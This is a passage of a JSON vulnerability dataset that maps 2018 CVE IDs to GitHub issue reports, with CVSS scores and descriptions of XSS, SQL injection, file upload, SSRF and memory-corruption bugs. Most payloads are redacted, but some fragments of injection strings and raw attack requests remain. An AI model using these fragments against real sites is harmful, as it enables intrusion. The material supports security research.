  22490. "exploitabilityScore": 3.9
  22491. },
  22492. {
  22493. "CVE_ID": "CVE-2018-14415",
  22494. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/28",
  22495. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/28",
  22496. "Repo_new": "idreamsoft/iCMS",
  22497. "Issue_Created_At": "2018-07-17T10:48:17Z",
  22498. "description": "Cross Site Scripting. First Enter the page APITAG and the payload is: FILETAG Then,we can see the result. FILETAG",
  22499. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22500. "severity": "MEDIUM",
  22501. "baseScore": 6.1,
  22502. "impactScore": 2.7,
  22503. "exploitabilityScore": 2.8
  22504. },
  22505. {
  22506. "CVE_ID": "CVE-2018-14422",
  22507. "Issue_Url_old": "https://github.com/thm/SansCMS/issues/7",
  22508. "Issue_Url_new": "https://github.com/thm/sanscms/issues/7",
  22509. "Repo_new": "thm/SansCMS",
  22510. "Issue_Created_At": "2017-09-06T14:43:58Z",
  22511. "description": "XSS in PATHTAG Here is a xss in PATHTAG about parameter q. POC: APITAG This poc will pop a window in APITAG browser.",
  22512. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22513. "severity": "MEDIUM",
  22514. "baseScore": 6.1,
  22515. "impactScore": 2.7,
  22516. "exploitabilityScore": 2.8
  22517. },
  22518. {
  22519. "CVE_ID": "CVE-2018-14435",
  22520. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1193",
  22521. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1193",
  22522. "Repo_new": "imagemagick/imagemagick",
  22523. "Issue_Created_At": "2018-07-04T05:52:15Z",
  22524. "description": "coders/pcd.c APITAG potential memory leak bug. Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description a potential memory leak bug locates in coders/pcd.c Steps to Reproduce the bug locates in FILETAG : APITAG function. the code frament is as follows: we allocate buffer memory, we freed it in normal branch\uff0cbut forgot free it in exception branch URLTAG ERRORTAG but we forget free it in URLTAG ERRORTAG credit: APITAG ( \u58a8\u4e91\u79d1\u6280) System Configuration APITAG",
  22525. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22526. "severity": "MEDIUM",
  22527. "baseScore": 6.5,
  22528. "impactScore": 3.6,
  22529. "exploitabilityScore": 2.8
  22530. },
  22531. {
  22532. "CVE_ID": "CVE-2018-14436",
  22533. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1191",
  22534. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1191",
  22535. "Repo_new": "imagemagick/imagemagick",
  22536. "Issue_Created_At": "2018-07-04T03:04:58Z",
  22537. "description": "coders/miff.c colormap potential memory leak bug. Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description a potential memory leak bug locates in coders/miff.c Steps to Reproduce the bug locates in URLTAG the code frament is as follows: the code locates in a if block,and we allocate colormap memory in the if block, we freed it in normal branch\uff0cbut forgot free it in exception branch ERRORTAG credit: APITAG System Configuration APITAG",
  22538. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22539. "severity": "MEDIUM",
  22540. "baseScore": 6.5,
  22541. "impactScore": 3.6,
  22542. "exploitabilityScore": 2.8
  22543. },
  22544. {
  22545. "CVE_ID": "CVE-2018-14437",
  22546. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1190",
  22547. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1190",
  22548. "Repo_new": "imagemagick/imagemagick",
  22549. "Issue_Created_At": "2018-07-03T11:39:50Z",
  22550. "description": "memory leak bug in meta.c: APITAG function. Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description hello,i find a memory leak bug in imagemagick,the details is on the Steps to Reproduce. Steps to Reproduce the bug located in meta.c ,static ssize_t APITAG ifile, Image ofile) function the bug code is on URLTAG the code fragment is as follows\uff1a CODETAG we can see that we allocate a memory and assigned it to line,but we forget to free it in the code: URLTAG the code is as follows: ERRORTAG APITAG APITAG",
  22551. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22552. "severity": "MEDIUM",
  22553. "baseScore": 6.5,
  22554. "impactScore": 3.6,
  22555. "exploitabilityScore": 2.8
  22556. },
  22557. {
  22558. "CVE_ID": "CVE-2018-14439",
  22559. "Issue_Url_old": "https://github.com/espritblock/eos4j/issues/6",
  22560. "Issue_Url_new": "https://github.com/espritblock/eos4j/issues/6",
  22561. "Repo_new": "espritblock/eos4j",
  22562. "Issue_Created_At": "2018-07-19T10:58:10Z",
  22563. "description": "\u8f6c\u8d26\u7cbe\u5ea6\u95ee\u9898. \u8f6c\u8d26\u65b9\u6cd5\u7684 asset \u5e8f\u5217\u5316\u65f6\uff0c\u628a amount NUMBERTAG APITAG EOS NUMBERTAG",
  22564. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  22565. "severity": "HIGH",
  22566. "baseScore": 7.5,
  22567. "impactScore": 3.6,
  22568. "exploitabilityScore": 3.9
  22569. },
  22570. {
  22571. "CVE_ID": "CVE-2018-14440",
  22572. "Issue_Url_old": "https://github.com/cckevincyh/CompanyWebsite/issues/3",
  22573. "Issue_Url_new": "https://github.com/cckevincyh/companywebsite/issues/3",
  22574. "Repo_new": "cckevincyh/companywebsite",
  22575. "Issue_Created_At": "2018-07-19T09:30:15Z",
  22576. "description": "\u8fd9\u6709\u4e2aSQL\u6ce8\u5165. POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Referer: URLTAG Cookie: APITAG DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG APITAG and NUMBERTAG and '%'='",
  22577. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22578. "severity": "CRITICAL",
  22579. "baseScore": 9.8,
  22580. "impactScore": 5.9,
  22581. "exploitabilityScore": 3.9
  22582. },
  22583. {
  22584. "CVE_ID": "CVE-2018-14441",
  22585. "Issue_Url_old": "https://github.com/cckevincyh/CompanyWebsite/issues/4",
  22586. "Issue_Url_new": "https://github.com/cckevincyh/companywebsite/issues/4",
  22587. "Repo_new": "cckevincyh/companywebsite",
  22588. "Issue_Created_At": "2018-07-19T09:38:23Z",
  22589. "description": "\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e. POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Referer: URLTAG Cookie: APITAG DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"upload\"; APITAG Content Type: image/jpeg APITAG APITAG APITAG APITAG APITAG APITAG cmd APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG",
  22590. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22591. "severity": "CRITICAL",
  22592. "baseScore": 9.8,
  22593. "impactScore": 5.9,
  22594. "exploitabilityScore": 3.9
  22595. },
  22596. {
  22597. "CVE_ID": "CVE-2018-14443",
  22598. "Issue_Url_old": "https://github.com/ArchimedesCAD/libredwg/issues/6",
  22599. "Issue_Url_new": "https://github.com/archimedescad/libredwg/issues/6",
  22600. "Repo_new": "archimedescad/libredwg",
  22601. "Issue_Created_At": "2018-07-19T12:19:58Z",
  22602. "description": "invail pointer deference in libredwg. libredwg(crash) github address APITAG compile the test case in the source APITAG test with poc APITAG the gdb output ERRORTAG As you can see, the APITAG is now a illegal pointer , and we got crash Program received signal SIGSEGV, Segmentation fault. By using asan , I found this is an heap overflow vulnerability the binary and the poc: ERRORTAG",
  22603. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22604. "severity": "MEDIUM",
  22605. "baseScore": 6.5,
  22606. "impactScore": 3.6,
  22607. "exploitabilityScore": 2.8
  22608. },
  22609. {
  22610. "CVE_ID": "CVE-2018-14445",
  22611. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/289",
  22612. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/289",
  22613. "Repo_new": "axiomatic-systems/bento4",
  22614. "Issue_Created_At": "2018-07-18T02:17:33Z",
  22615. "description": "ddos in APITAG When open a crafted APITAG file, The program could enter APITAG , and it could hang on, then program could be not response CODETAG The poc APITAG",
  22616. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22617. "severity": "MEDIUM",
  22618. "baseScore": 6.5,
  22619. "impactScore": 3.6,
  22620. "exploitabilityScore": 2.8
  22621. },
  22622. {
  22623. "CVE_ID": "CVE-2018-14446",
  22624. "Issue_Url_old": "https://github.com/TechSmith/mp4v2/issues/20",
  22625. "Issue_Url_new": "https://github.com/techsmith/mp4v2/issues/20",
  22626. "Repo_new": "techsmith/mp4v2",
  22627. "Issue_Created_At": "2018-07-18T02:56:44Z",
  22628. "description": "heap overflow in APITAG When open a crafted APITAG file, The program could tigger heap overflow , this could overwrite vtable ptr . and then enter APITAG ,and use the vtable , then program crash. The gdb output is blow: ERRORTAG As you can see , program crash in APITAG now $rc NUMBERTAG deadbeef , which is our control. fuzz log ERRORTAG",
  22629. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22630. "severity": "HIGH",
  22631. "baseScore": 8.8,
  22632. "impactScore": 5.9,
  22633. "exploitabilityScore": 2.8
  22634. },
  22635. {
  22636. "CVE_ID": "CVE-2018-14447",
  22637. "Issue_Url_old": "https://github.com/martinh/libconfuse/issues/109",
  22638. "Issue_Url_new": "https://github.com/libconfuse/libconfuse/issues/109",
  22639. "Repo_new": "libconfuse/libconfuse",
  22640. "Issue_Created_At": "2018-07-18T08:48:53Z",
  22641. "description": "out of bound read in trim_whitespace. When open a crafted file, The program could tigger out of bound read ERRORTAG As you can see APITAG point a APITAG size malloc chunk (which size for user is APITAG ), and APITAG is APITAG then APITAG could access NUMBERTAG byte out of the vaild memory. the poc file APITAG",
  22642. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22643. "severity": "HIGH",
  22644. "baseScore": 8.8,
  22645. "impactScore": 5.9,
  22646. "exploitabilityScore": 2.8
  22647. },
  22648. {
  22649. "CVE_ID": "CVE-2018-14448",
  22650. "Issue_Url_old": "https://github.com/ponchio/untrunc/issues/131",
  22651. "Issue_Url_new": "https://github.com/ponchio/untrunc/issues/131",
  22652. "Repo_new": "ponchio/untrunc",
  22653. "Issue_Created_At": "2018-07-19T00:20:04Z",
  22654. "description": "null pointer reference in libav. When open a crafted APITAG file, The program could be Segmentation fault ERRORTAG Now let see in gdb ERRORTAG Crash at APITAG , the asm code are as below APITAG and APITAG , so null pointer reference The vulnerability is in track.cpp CODETAG From the debug session , I find that the following line tigger the vulnerability APITAG stsd obj is a null pointer , let's see in APITAG ERRORTAG The function could return NULL , but APITAG don't consider it. To fix it , may be only need to check the APITAG 's return value The poc file ERRORTAG",
  22655. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22656. "severity": "MEDIUM",
  22657. "baseScore": 6.5,
  22658. "impactScore": 3.6,
  22659. "exploitabilityScore": 2.8
  22660. },
  22661. {
  22662. "CVE_ID": "CVE-2018-14471",
  22663. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/32",
  22664. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/32",
  22665. "Repo_new": "libredwg/libredwg",
  22666. "Issue_Created_At": "2018-07-20T14:22:14Z",
  22667. "description": "null point dereference in APITAG When open the crafted dwg file , it could tigger null point dereference in APITAG Let's see the gdb output ERRORTAG As you can see , crash in APITAG and null point dereference is NUMBERTAG so null point dereference \u3002 The Vulnerability is that APITAG in APITAG don't check the APITAG . ERRORTAG To fix it, please verify the ctrl >block_headers before use it. The poc file APITAG",
  22668. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22669. "severity": "MEDIUM",
  22670. "baseScore": 6.5,
  22671. "impactScore": 3.6,
  22672. "exploitabilityScore": 2.8
  22673. },
  22674. {
  22675. "CVE_ID": "CVE-2018-14472",
  22676. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/144",
  22677. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/144",
  22678. "Repo_new": "wuzhicms/wuzhicms",
  22679. "Issue_Created_At": "2018-07-20T13:30:12Z",
  22680. "description": "Wuzhicms NUMBERTAG PATHTAG hava a SQL Injection Vulnerability. Vulnerability file APITAG CODETAG The APITAG parameter is taken directly into the execution of the get_one function without any filtering.\u00a0 POC APITAG FILETAG",
  22681. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  22682. "severity": "HIGH",
  22683. "baseScore": 7.2,
  22684. "impactScore": 5.9,
  22685. "exploitabilityScore": 1.2
  22686. },
  22687. {
  22688. "CVE_ID": "CVE-2018-14476",
  22689. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/88",
  22690. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/88",
  22691. "Repo_new": "semplon/genixcms",
  22692. "Issue_Created_At": "2017-11-23T11:19:21Z",
  22693. "description": "Advisory from Netsparker APITAG NUMBERTAG ulnerability . Hello, While testing the Netsparker web application security scanner we identified a vulnerability in APITAG NUMBERTAG Can you please advise whom shall we contact to disclose the vulnerability details so it can be fixed? Please email me: daniel at netsparker dot com Looking forward to hearing from you. Regards, Daniel Bishtawi Marketing Administrator | Netsparker Web Application Security Scanner",
  22694. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22695. "severity": "MEDIUM",
  22696. "baseScore": 6.1,
  22697. "impactScore": 2.7,
  22698. "exploitabilityScore": 2.8
  22699. },
  22700. {
  22701. "CVE_ID": "CVE-2018-14498",
  22702. "Issue_Url_old": "https://github.com/mozilla/mozjpeg/issues/299",
  22703. "Issue_Url_new": "https://github.com/mozilla/mozjpeg/issues/299",
  22704. "Repo_new": "mozilla/mozjpeg",
  22705. "Issue_Created_At": "2018-07-20T04:57:53Z",
  22706. "description": "APITAG heap buffer overflow inside get NUMBERTAG bit_row (rdbmp.c). Our fuzzer detected several buffer overflow errors inside APITAG (lines NUMBERTAG and NUMBERTAG as of NUMBERTAG cba. These can be triggered with APITAG where $POC can be found in this directory URLTAG (files ending with APITAG ). Error messages are like: ERRORTAG",
  22707. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22708. "severity": "MEDIUM",
  22709. "baseScore": 6.5,
  22710. "impactScore": 3.6,
  22711. "exploitabilityScore": 2.8
  22712. },
  22713. {
  22714. "CVE_ID": "CVE-2018-14498",
  22715. "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/258",
  22716. "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/258",
  22717. "Repo_new": "libjpeg-turbo/libjpeg-turbo",
  22718. "Issue_Created_At": "2018-07-20T13:44:22Z",
  22719. "description": "APITAG heap buffer overflow inside get NUMBERTAG bit_row (rdbmp.c). APITAG was firstly mentioned in URLTAG and following APITAG suggestion I checked f4b8a5c and found similar issues; note that libjpeg did not trigger several crashes that mozjpeg triggered). It can be triggered with APITAG where $POC can be found in this directory URLTAG (files ending with .bmp). ASAN messages are like: ERRORTAG",
  22720. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22721. "severity": "MEDIUM",
  22722. "baseScore": 6.5,
  22723. "impactScore": 3.6,
  22724. "exploitabilityScore": 2.8
  22725. },
  22726. {
  22727. "CVE_ID": "CVE-2018-14499",
  22728. "Issue_Url_old": "https://github.com/hyyyp/HYBBS/issues/1",
  22729. "Issue_Url_new": "https://github.com/hyyyp/hybbs/issues/1",
  22730. "Repo_new": "hyyyp/HYBBS",
  22731. "Issue_Created_At": "2018-07-21T02:15:47Z",
  22732. "description": "Stored XSS was found in the title of the article. Frist I installed the HYBBS and registered an account to test. Click the \"\u53d1\u8868\u65b0\u4e3b\u9898\". FILETAG Then at this page , I input ' APITAG ' at the title of an APITAG like this FILETAG At last, click \"\u53d1\u8868\u201c. Then we can see the XSS has occurred",
  22733. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22734. "severity": "MEDIUM",
  22735. "baseScore": 6.1,
  22736. "impactScore": 2.7,
  22737. "exploitabilityScore": 2.8
  22738. },
  22739. {
  22740. "CVE_ID": "CVE-2018-14500",
  22741. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/431",
  22742. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/431",
  22743. "Repo_new": "joyplus/joyplus-cms",
  22744. "Issue_Created_At": "2018-07-19T02:13:47Z",
  22745. "description": "joyplus cms NUMBERTAG PATHTAG requests: GET PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Cookie: security_level NUMBERTAG APITAG adminid NUMBERTAG adminname=admin; APITAG APITAG X Forwarded For NUMBERTAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG FILETAG FILETAG",
  22746. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22747. "severity": "MEDIUM",
  22748. "baseScore": 6.1,
  22749. "impactScore": 2.7,
  22750. "exploitabilityScore": 2.8
  22751. },
  22752. {
  22753. "CVE_ID": "CVE-2018-14501",
  22754. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/432",
  22755. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/432",
  22756. "Repo_new": "joyplus/joyplus-cms",
  22757. "Issue_Created_At": "2018-07-19T02:35:22Z",
  22758. "description": "joyplus cms NUMBERTAG has Sql vulnerability. Request POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded Content Length NUMBERTAG Referer: FILETAG Cookie: security_level NUMBERTAG APITAG adminid NUMBERTAG adminname=admin; APITAG APITAG X Forwarded For NUMBERTAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG Sqlmap: (custom) POST parameter APITAG like NUMBERTAG is vulnerable. Do you want to keep testing the others (if any)? FILETAG",
  22759. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22760. "severity": "CRITICAL",
  22761. "baseScore": 9.8,
  22762. "impactScore": 5.9,
  22763. "exploitabilityScore": 3.9
  22764. },
  22765. {
  22766. "CVE_ID": "CVE-2018-14505",
  22767. "Issue_Url_old": "https://github.com/mitmproxy/mitmproxy/issues/3234",
  22768. "Issue_Url_new": "https://github.com/mitmproxy/mitmproxy/issues/3234",
  22769. "Repo_new": "mitmproxy/mitmproxy",
  22770. "Issue_Created_At": "2018-07-01T15:58:07Z",
  22771. "description": "mitmweb isn't protected against DNS rebinding. The mitmweb interface does not seem to include protection against DNS rebinding. This could be exploited by a malicious website to either access the sniffed data or run arbitrary Python scripts on the filesystem by setting the scripts config option. I have hacked together a APITAG FILETAG (nothing really special to be seen though).",
  22772. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22773. "severity": "HIGH",
  22774. "baseScore": 8.8,
  22775. "impactScore": 5.9,
  22776. "exploitabilityScore": 2.8
  22777. },
  22778. {
  22779. "CVE_ID": "CVE-2018-14512",
  22780. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/143",
  22781. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/143",
  22782. "Repo_new": "wuzhicms/wuzhicms",
  22783. "Issue_Created_At": "2018-07-20T07:35:18Z",
  22784. "description": "There is a XSS vulnerability. > A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the APITAG parameter post to the APITAG When administrator access system settings mail server .then XSS vulnerability is triggered successfully POC CODETAG Vulnerability trigger point APITAG CODETAG APITAG APITAG APITAG",
  22785. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22786. "severity": "MEDIUM",
  22787. "baseScore": 6.1,
  22788. "impactScore": 2.7,
  22789. "exploitabilityScore": 2.8
  22790. },
  22791. {
  22792. "CVE_ID": "CVE-2018-14513",
  22793. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/145",
  22794. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/145",
  22795. "Repo_new": "wuzhicms/wuzhicms",
  22796. "Issue_Created_At": "2018-07-20T15:49:43Z",
  22797. "description": "wuzhicms NUMBERTAG SS vulnerability. > A xss vulnerability was discovered in WUZHI CMS NUMBERTAG There is a persistent XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML via the APITAG parameter post to the APITAG When administrator access system settings mail server .then XSS vulnerability is triggered successfully POC APITAG CODETAG vulnerability trigger point APITAG APITAG APITAG",
  22798. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  22799. "severity": "MEDIUM",
  22800. "baseScore": 6.1,
  22801. "impactScore": 2.7,
  22802. "exploitabilityScore": 2.8
  22803. },
  22804. {
  22805. "CVE_ID": "CVE-2018-14514",
  22806. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/29",
  22807. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/29",
  22808. "Repo_new": "idreamsoft/iCMS",
  22809. "Issue_Created_At": "2018-07-21T10:20:18Z",
  22810. "description": "iCMS NUMBERTAG SSRF vulnerability GET SHELL. a SSRF vulnerability was discovered in iCMS NUMBERTAG here is a SSRF vulnerability that allows attackers to remotely construct malicious data to read server sensitive resource files, detect intranets, or even getshell . via the APITAG attackers use this vulnerability to directly control the web service area. POC Loophole code APITAG Correct HTTP requests APITAG FILE protocol malware request APITAG APITAG APITAG APITAG APITAG APITAG",
  22811. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22812. "severity": "CRITICAL",
  22813. "baseScore": 9.8,
  22814. "impactScore": 5.9,
  22815. "exploitabilityScore": 3.9
  22816. },
  22817. {
  22818. "CVE_ID": "CVE-2018-14515",
  22819. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/146",
  22820. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/146",
  22821. "Repo_new": "wuzhicms/wuzhicms",
  22822. "Issue_Created_At": "2018-07-22T16:19:30Z",
  22823. "description": "wuzhicms NUMBERTAG sql injection vulnerability. > a sql injection was discovered in WUZHI CMS NUMBERTAG APITAG is a sql injection vulnerability which allows remote attackers to Injecting a malicious SQL statement into a server via the APITAG POC code that has loopholes APITAG ERRORTAG APITAG APITAG APITAG",
  22824. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22825. "severity": "CRITICAL",
  22826. "baseScore": 9.8,
  22827. "impactScore": 5.9,
  22828. "exploitabilityScore": 3.9
  22829. },
  22830. {
  22831. "CVE_ID": "CVE-2018-14522",
  22832. "Issue_Url_old": "https://github.com/aubio/aubio/issues/188",
  22833. "Issue_Url_new": "https://github.com/aubio/aubio/issues/188",
  22834. "Repo_new": "aubio/aubio",
  22835. "Issue_Created_At": "2018-07-22T11:50:21Z",
  22836. "description": "Another SEGV signal problem found. When I run the program aubionotes. The address sanitizer showed this: ERRORTAG The input file of the program has been displayed at: URLTAG The command line is just ./aubionotes testcase3",
  22837. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22838. "severity": "HIGH",
  22839. "baseScore": 8.8,
  22840. "impactScore": 5.9,
  22841. "exploitabilityScore": 2.8
  22842. },
  22843. {
  22844. "CVE_ID": "CVE-2018-14523",
  22845. "Issue_Url_old": "https://github.com/aubio/aubio/issues/189",
  22846. "Issue_Url_new": "https://github.com/aubio/aubio/issues/189",
  22847. "Repo_new": "aubio/aubio",
  22848. "Issue_Created_At": "2018-07-22T11:52:12Z",
  22849. "description": "A global buffer overflow problem has been detected.. There is a global buffer overflow problem . Here are the details: ERRORTAG The input file has been displayed at : URLTAG The command line is just ./aubionotes testcase2",
  22850. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  22851. "severity": "HIGH",
  22852. "baseScore": 8.8,
  22853. "impactScore": 5.9,
  22854. "exploitabilityScore": 2.8
  22855. },
  22856. {
  22857. "CVE_ID": "CVE-2018-14524",
  22858. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/33",
  22859. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/33",
  22860. "Repo_new": "libredwg/libredwg",
  22861. "Issue_Created_At": "2018-07-20T23:26:33Z",
  22862. "description": "double free in dwg_free. When open the crafted dwg file , it could tigger double free in APITAG Let's see the program error output ERRORTAG And the output with asan ERRORTAG According debuging , I found that When open the crafted dwg file , APITAG could call APITAG , in APITAG first, it could call APITAG to free a pointer (for example : APITAG ) CODETAG The backtrace are as below CODETAG And then it could call APITAG again , it could call APITAG to free APITAG again. The backtrace are as below CODETAG The poc file APITAG",
  22863. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  22864. "severity": "MEDIUM",
  22865. "baseScore": 6.5,
  22866. "impactScore": 3.6,
  22867. "exploitabilityScore": 2.8
  22868. },
  22869. {
  22870. "CVE_ID": "CVE-2018-14531",
  22871. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/293",
  22872. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/293",
  22873. "Repo_new": "axiomatic-systems/bento4",
  22874. "Issue_Created_At": "2018-07-22T08:57:37Z",
  22875. "description": "A heap buffer overflow has occurred when running program mp4info.. A heap buffer overflow has occurred when running program mp4info. ERRORTAG The testing program is mp4info. And the input file has been put at: FILETAG",
  22876. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22877. "severity": "CRITICAL",
  22878. "baseScore": 9.8,
  22879. "impactScore": 5.9,
  22880. "exploitabilityScore": 3.9
  22881. },
  22882. {
  22883. "CVE_ID": "CVE-2018-14532",
  22884. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/294",
  22885. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/294",
  22886. "Repo_new": "axiomatic-systems/bento4",
  22887. "Issue_Created_At": "2018-07-22T10:35:10Z",
  22888. "description": "A heap buffer overflow has occurred when running program mp NUMBERTAG hls.. A heap buffer overflow has occurred when running program mp NUMBERTAG hls. ERRORTAG The testing program is mp NUMBERTAG hls. And the input file has been put at: URLTAG",
  22889. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  22890. "severity": "CRITICAL",
  22891. "baseScore": 9.8,
  22892. "impactScore": 5.9,
  22893. "exploitabilityScore": 3.9
  22894. },
  22895. {
  22896. "CVE_ID": "CVE-2018-14543",
  22897. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/292",
  22898. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/292",
  22899. "Repo_new": "axiomatic-systems/bento4",
  22900. "Issue_Created_At": "2018-07-20T09:19:47Z",
